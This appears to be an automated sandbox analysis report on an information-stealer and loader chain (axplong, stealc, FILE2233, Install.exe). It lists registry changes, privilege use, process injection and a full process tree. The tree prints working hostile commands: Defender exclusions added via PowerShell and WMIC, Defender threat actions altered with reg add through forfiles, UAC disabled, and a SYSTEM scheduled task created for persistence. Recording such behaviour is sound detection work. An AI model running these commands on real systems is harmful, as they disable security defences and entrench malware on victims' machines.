created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f1c9ec80-0000-0000-0000-d01200000000}\NukeOnDelete = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" bgsBSgx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3352 schtasks.exe 4492 schtasks.exe 4224 schtasks.exe 2552 schtasks.exe 4220 schtasks.exe 3228 schtasks.exe 1300 schtasks.exe 4828 schtasks.exe 4568 schtasks.exe 4528 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 752 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 752 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 4764 axplong.exe 4764 axplong.exe 1272 stealc_default.exe 1272 stealc_default.exe 4476 xFQnh8cWxU.exe 4476 xFQnh8cWxU.exe 5004 oBQMEm0i5e.exe 5004 oBQMEm0i5e.exe 1272 stealc_default.exe 1272 stealc_default.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 4572 powershell.exe 4572 powershell.exe 4572 powershell.exe 4124 axplong.exe 4124 axplong.exe 2368 powershell.exe 2368 powershell.exe 2368 powershell.exe 2432 powershell.exe 2432 powershell.exe 2432 powershell.exe 2864 powershell.exe 2864 powershell.exe 2864 powershell.exe 396 powershell.EXE 396 powershell.EXE 396 powershell.EXE 3288 powershell.exe 3288 powershell.exe 3288 powershell.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 1376 powershell.exe 1376 powershell.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 1376 powershell.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe 4232 bgsBSgx.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5004 oBQMEm0i5e.exe Token: SeDebugPrivilege 4476 xFQnh8cWxU.exe Token: SeBackupPrivilege 4476 xFQnh8cWxU.exe Token: SeBackupPrivilege 5004 oBQMEm0i5e.exe Token: SeSecurityPrivilege 5004 oBQMEm0i5e.exe Token: SeSecurityPrivilege 4476 xFQnh8cWxU.exe Token: SeSecurityPrivilege 5004 oBQMEm0i5e.exe Token: SeSecurityPrivilege 5004 oBQMEm0i5e.exe Token: SeSecurityPrivilege 5004 oBQMEm0i5e.exe Token: SeSecurityPrivilege 4476 xFQnh8cWxU.exe Token: SeSecurityPrivilege 4476 xFQnh8cWxU.exe Token: SeSecurityPrivilege 4476 xFQnh8cWxU.exe Token: SeDebugPrivilege 2536 powershell.exe Token: SeDebugPrivilege 732 AddInProcess32.exe Token: SeDebugPrivilege 5096 powershell.exe Token: SeDebugPrivilege 4572 powershell.exe Token: SeIncreaseQuotaPrivilege 4200 WMIC.exe Token: SeSecurityPrivilege 4200 WMIC.exe Token: SeTakeOwnershipPrivilege 4200 WMIC.exe Token: SeLoadDriverPrivilege 4200 WMIC.exe Token: SeSystemProfilePrivilege 4200 WMIC.exe Token: SeSystemtimePrivilege 4200 WMIC.exe Token: SeProfSingleProcessPrivilege 4200 WMIC.exe Token: SeIncBasePriorityPrivilege 4200 WMIC.exe Token: SeCreatePagefilePrivilege 4200 WMIC.exe Token: SeBackupPrivilege 4200 WMIC.exe Token: SeRestorePrivilege 4200 WMIC.exe Token: SeShutdownPrivilege 4200 WMIC.exe Token: SeDebugPrivilege 4200 WMIC.exe Token: SeSystemEnvironmentPrivilege 4200 WMIC.exe Token: SeRemoteShutdownPrivilege 4200 WMIC.exe Token: SeUndockPrivilege 4200 WMIC.exe Token: SeManageVolumePrivilege 4200 WMIC.exe Token: 33 4200 WMIC.exe Token: 34 4200 WMIC.exe Token: 35 4200 WMIC.exe Token: 36 4200 WMIC.exe Token: SeIncreaseQuotaPrivilege 4200 WMIC.exe Token: SeSecurityPrivilege 4200 WMIC.exe Token: SeTakeOwnershipPrivilege 4200 WMIC.exe Token: SeLoadDriverPrivilege 4200 WMIC.exe Token: SeSystemProfilePrivilege 4200 WMIC.exe Token: SeSystemtimePrivilege 4200 WMIC.exe Token: SeProfSingleProcessPrivilege 4200 WMIC.exe Token: SeIncBasePriorityPrivilege 4200 WMIC.exe Token: SeCreatePagefilePrivilege 4200 WMIC.exe Token: SeBackupPrivilege 4200 WMIC.exe Token: SeRestorePrivilege 4200 WMIC.exe Token: SeShutdownPrivilege 4200 WMIC.exe Token: SeDebugPrivilege 4200 WMIC.exe Token: SeSystemEnvironmentPrivilege 4200 WMIC.exe Token: SeRemoteShutdownPrivilege 4200 WMIC.exe Token: SeUndockPrivilege 4200 WMIC.exe Token: SeManageVolumePrivilege 4200 WMIC.exe Token: 33 4200 WMIC.exe Token: 34 4200 WMIC.exe Token: 35 4200 WMIC.exe Token: 36 4200 WMIC.exe Token: SeDebugPrivilege 2368 powershell.exe Token: SeDebugPrivilege 2432 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 396 powershell.EXE Token: SeDebugPrivilege 3288 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 752 wrote to memory of 4764 752 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 86 PID 752 wrote to memory of 4764 752 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 86 PID 752 wrote to memory of 4764 752 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 86 PID 4764 wrote to memory of 3548 4764 axplong.exe 87 PID 4764 wrote to memory of 3548 4764 axplong.exe 87 PID 4764 wrote to memory of 3548 4764 axplong.exe 87 PID 3548 wrote to memory of 1608 3548 GOLD.exe 89 PID 3548 wrote to memory of 1608 3548 GOLD.exe 89 PID 3548 wrote to memory of 1608 3548 GOLD.exe 89 PID 3548 wrote to memory of 1608 3548 GOLD.exe 89 PID 3548 wrote to memory of 1608 3548 GOLD.exe 89 PID 3548 wrote to memory of 1608 3548 GOLD.exe 89 PID 3548 wrote to memory of 1608 3548 GOLD.exe 89 PID 3548 wrote to memory of 1608 3548 GOLD.exe 89 PID 4764 wrote to memory of 4684 4764 axplong.exe 90 PID 4764 wrote to memory of 4684 4764 axplong.exe 90 PID 4764 wrote to memory of 4684 4764 axplong.exe 90 PID 4764 wrote to memory of 3060 4764 axplong.exe 92 PID 4764 wrote to memory of 3060 4764 axplong.exe 92 PID 4764 wrote to memory of 3060 4764 axplong.exe 92 PID 3060 wrote to memory of 1296 3060 newalp.exe 93 PID 3060 wrote to memory of 1296 3060 newalp.exe 93 PID 3060 wrote to memory of 1296 3060 newalp.exe 93 PID 4684 wrote to memory of 4180 4684 crypteda.exe 94 PID 4684 wrote to memory of 4180 4684 crypteda.exe 94 PID 4684 wrote to memory of 4180 4684 crypteda.exe 94 PID 4684 wrote to memory of 2556 4684 crypteda.exe 95 PID 4684 wrote to memory of 2556 4684 crypteda.exe 95 PID 4684 wrote to memory of 2556 4684 crypteda.exe 95 PID 4684 wrote to memory of 5108 4684 crypteda.exe 96 PID 4684 wrote to memory of 5108 4684 crypteda.exe 96 PID 4684 wrote to memory of 5108 4684 crypteda.exe 96 PID 4684 wrote to memory of 2112 4684 crypteda.exe 97 PID 4684 wrote to memory of 2112 4684 crypteda.exe 97 PID 4684 wrote to memory of 2112 4684 crypteda.exe 97 PID 4684 wrote to memory of 2112 4684 crypteda.exe 97 PID 4684 wrote to memory of 2112 4684 crypteda.exe 97 PID 4684 wrote to memory of 2112 4684 crypteda.exe 97 PID 4684 wrote to memory of 2112 4684 crypteda.exe 97 PID 4684 wrote to memory of 2112 4684 crypteda.exe 97 PID 4684 wrote to memory of 2112 4684 crypteda.exe 97 PID 4684 wrote to memory of 2112 4684 crypteda.exe 97 PID 2112 wrote to memory of 5004 2112 RegAsm.exe 98 PID 2112 wrote to memory of 5004 2112 RegAsm.exe 98 PID 2112 wrote to memory of 5004 2112 RegAsm.exe 98 PID 2112 wrote to memory of 4476 2112 RegAsm.exe 100 PID 2112 wrote to memory of 4476 2112 RegAsm.exe 100 PID 2112 wrote to memory of 4476 2112 RegAsm.exe 100 PID 4764 wrote to memory of 224 4764 axplong.exe 102 PID 4764 wrote to memory of 224 4764 axplong.exe 102 PID 4764 wrote to memory of 224 4764 axplong.exe 102 PID 4764 wrote to memory of 1272 4764 axplong.exe 103 PID 4764 wrote to memory of 1272 4764 axplong.exe 103 PID 4764 wrote to memory of 1272 4764 axplong.exe 103 PID 4764 wrote to memory of 4068 4764 axplong.exe 104 PID 4764 wrote to memory of 4068 4764 axplong.exe 104 PID 4764 wrote to memory of 1088 4764 axplong.exe 107 PID 4764 wrote to memory of 1088 4764 axplong.exe 107 PID 4764 wrote to memory of 1088 4764 axplong.exe 107 PID 4068 wrote to memory of 2536 4068 FILE2233.exe 108 PID 4068 wrote to memory of 2536 4068 FILE2233.exe 108 PID 4068 wrote to memory of 1576 4068 FILE2233.exe 109 PID 4068 wrote to memory of 1576 4068 FILE2233.exe 109 PID 4068 wrote to memory of 1576 4068 FILE2233.exe 109 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" FILE2233.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe"C:\Users\Admin\AppData\Local\Temp\60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1608
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:2556
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:5108
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Users\Admin\AppData\Roaming\oBQMEm0i5e.exe"C:\Users\Admin\AppData\Roaming\oBQMEm0i5e.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
C:\Users\Admin\AppData\Roaming\xFQnh8cWxU.exe"C:\Users\Admin\AppData\Roaming\xFQnh8cWxU.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"4⤵
- Executes dropped EXE
PID:1296
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:224
-
-
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1272
-
-
C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe"C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe"3⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵PID:1576
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"4⤵PID:1908
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:732 -
C:\Users\Admin\Pictures\FXPIXmmOlcOfR4xFLhyvdYQ1.exe"C:\Users\Admin\Pictures\FXPIXmmOlcOfR4xFLhyvdYQ1.exe"5⤵
- Executes dropped EXE
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB0.tmp\Install.exe.\Install.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5000 -
C:\Users\Admin\AppData\Local\Temp\7zSD08E.tmp\Install.exe.\Install.exe /OjjdidWwa "385104" /S7⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:1032 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵PID:4616
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
PID:3008 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵PID:3288
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:2448
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
PID:3732 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵PID:4080
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵PID:1812
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2560 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵PID:4140
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:2864
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
PID:1060 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵
- System Location Discovery: System Language Discovery
PID:4124 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵PID:4952
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵
- Indirect Command Execution
PID:5036 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵PID:3952
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force12⤵PID:2760
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"8⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2348 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- System Location Discovery: System Language Discovery
PID:3320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdLMAcyiuofwZlrejw" /SC once /ST 09:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD08E.tmp\Install.exe\" jm /fdidluOi 385104 /S" /V1 /F8⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 9768⤵
- Program crash
PID:2136
-
-
-
-
-
C:\Users\Admin\Pictures\xJAM4MsezZDtYmybnRQtNEFI.exe"C:\Users\Admin\Pictures\xJAM4MsezZDtYmybnRQtNEFI.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2104
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:4784
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000090001\MYNEWRDX.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\MYNEWRDX.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1088
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSD08E.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSD08E.tmp\Install.exe jm /fdidluOi 385104 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1288 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:1556
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:3204 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:4240
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:4144
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:4840 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:5004 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:4968
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:3020 -
